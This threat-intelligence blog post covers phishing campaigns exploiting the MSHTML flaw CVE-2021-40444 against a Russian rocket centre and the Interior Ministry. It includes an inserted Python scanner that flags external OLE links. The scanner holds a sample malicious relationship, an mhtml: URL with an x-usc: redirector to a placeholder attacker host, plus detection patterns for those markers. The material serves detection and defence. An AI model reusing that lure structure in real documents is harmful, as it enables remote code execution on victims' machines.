Russian Govt Hit

The Malwarebytes Intelligence Team is reporting that the MSHTML vulnerability classified as CVE-2021-40444 has become the focus of threat actors targeting Russian government entities.  Its researchers intercepted phishing email attachments revealing that attackers were trying to target Russian organizations.

The CVE-2021-40444 vulnerability involves ActiveX.  It is an old flaw that was only discovered recently, and soon after, threat actors began sharing PoCs, tutorials, and exploits for it on hacking forums, giving interested individuals step-by-step instructions for launching their own attacks.

Microsoft responded promptly by publishing mitigation guidelines, disabling the installation of new ActiveX controls, and releasing a patch in its latest Patch Tuesday update.  However, patching takes considerably longer than it takes attackers to exploit the flaw.[1]

Email Template Explanation - The first template Malwarebytes analyzed was crafted to look like an internal communication within the Joint Stock Company State Rocket Center named after Academician V.P. Makeyev.  According to Malwarebytes, the phishing email states that the HR department is checking employees’ personal data and urges them to fill out a form in the email or reply to the mail.  To fill out the form, the receiver has to enable editing, which triggers the exploit.


About the Affected Entities - GREC Makeyev is Russia’s strategic defense and industrial complex for the space and rocket industry. This facility is also the country’s main solid and liquid fuel strategic missile system developer.

It is therefore one of Russia’s leading R&D centers for rocket and space technology.

The Russian Ministry of Interior in Moscow is also the target of a similar campaign.  Researchers noted that evidence of cybercrimes launched against Russian entities is a rarity. Considering that attackers are targeting the country’s space/rocket developer, it seems likely that a state-sponsored actor is perpetrating these attacks.

How does the Attack Work? - According to Malwarebytes’ blog post[2], the attack mainly depends on MSHTML.  It loads a specially designed ActiveX control when the receiver opens an infected MS Office document and runs arbitrary code to infect the system with more malware.
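Because the malicious document has to reference an externally hosted ActiveX/HTML component before MSHTML ever runs, defenders can look for that reference in the document container itself.  The following Python scanner is an added example, not code from this page or from Malwarebytes.  It assumes, as a labelled assumption, that a lure document abusing this flaw carries an oleObject relationship in one of its .rels parts whose Target is an external URL, typically using the mhtml: scheme with an x-usc: redirector; the hostnames used in the constructed samples are placeholders, not indicators from the campaign described above.

```python
"""Scan Office Open XML (.docx) containers for external OLE-object relationships.

Added example (not code from the page or from Malwarebytes).  Assumption: a
document abusing the MSHTML flaw has, in a .rels part, an oleObject
relationship with TargetMode="External" and a Target such as
"mhtml:http://...!x-usc:http://...".  Hostnames below are constructed placeholders.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE_SUFFIX = "/oleObject"

# Constructed sample: document relationships pointing an OLE object at an
# external mhtml: URL.  "attacker.invalid" is a placeholder, not a real IoC.
SUSPICIOUS_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://attacker.invalid/side.html!x-usc:http://attacker.invalid/side.html" TargetMode="External"/>
</Relationships>"""

# Constructed sample: an ordinary document with only internal relationships.
BENIGN_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/>
</Relationships>"""


def build_docx(rels_xml: str) -> bytes:
    """Build a minimal .docx (a zip container) around the given rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


def find_external_ole(docx_bytes: bytes) -> List[Dict[str, object]]:
    """Return one finding per relationship that looks like an external OLE load.

    Every .rels part in the container is parsed, so relationships hidden in
    headers, footers or embedded parts are covered as well as document.xml.rels.
    """
    findings: List[Dict[str, object]] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                reasons = []
                # An OLE object that must be fetched from outside the package.
                if rel.get("Type", "").endswith(OLE_TYPE_SUFFIX) and rel.get("TargetMode") == "External":
                    reasons.append("external oleObject relationship")
                # The mhtml: scheme hands the fetch to MSHTML.
                if re.match(r"mhtml:", target, re.IGNORECASE):
                    reasons.append("mhtml: scheme in target")
                # The x-usc: redirector forces a second, remote URL to be loaded.
                if "!x-usc:" in target.lower():
                    reasons.append("x-usc: redirector in target")
                if reasons:
                    findings.append({"part": name, "id": rel.get("Id"), "target": target, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("suspicious", SUSPICIOUS_RELS)):
        hits = find_external_ole(build_docx(rels))
        print(f"{label}: {len(hits)} finding(s)")
        for h in hits:
            print(f"  {h['part']} {h['id']} -> {h['target']}: {', '.join(h['reasons'])}")
```

To run this against real mail attachments, replace the constructed samples with the bytes of each .docx pulled from the mail gateway's quarantine; a non-empty result is a reason to hold the message for analysis rather than proof of exploitation, since legitimate documents can also link external OLE objects.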

Researchers also found a second malicious attachment that purports to originate from the Ministry of the Interior in Moscow.  This attachment can be used against other promising targets.  The document’s title is in Russian and reads: “Notification of illegal activity.”  The email urges the victim to return the filled-out form within 7 days.

Russia under cyber attacks - Usually, when it comes to cyberattacks, Russia or China are the usual suspects pointed out by the US and its allies.  Lately, however, Russia has been facing large-scale cyberattacks, including the world’s largest DDoS attack on Yandex[3] earlier this month and 19 DDoS attacks on its electronic voting system in a single day just a few days ago.  In August, a new variant of the infamous Konni RAT was caught targeting Russia[4].  In that campaign, threat actors exploited economic and political issues between Russia and neighboring countries.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@wapacklabs.com

Weekly Cyber Intelligence Briefings:

REDSHORTS - Weekly Cyber Intelligence Briefings

https://attendee.gotowebinar.com/register/3702558539639477516

[1] https://www.hackread.com/hackers-russia-ministry-rocket-center-mshtml-vulnerability/

[2] https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/

[3] https://www.hackread.com/yandex-ddos-attack-200000-hacked-devices/

[4] https://www.hackread.com/konni-rat-variant-hits-russia-ongoing-attack/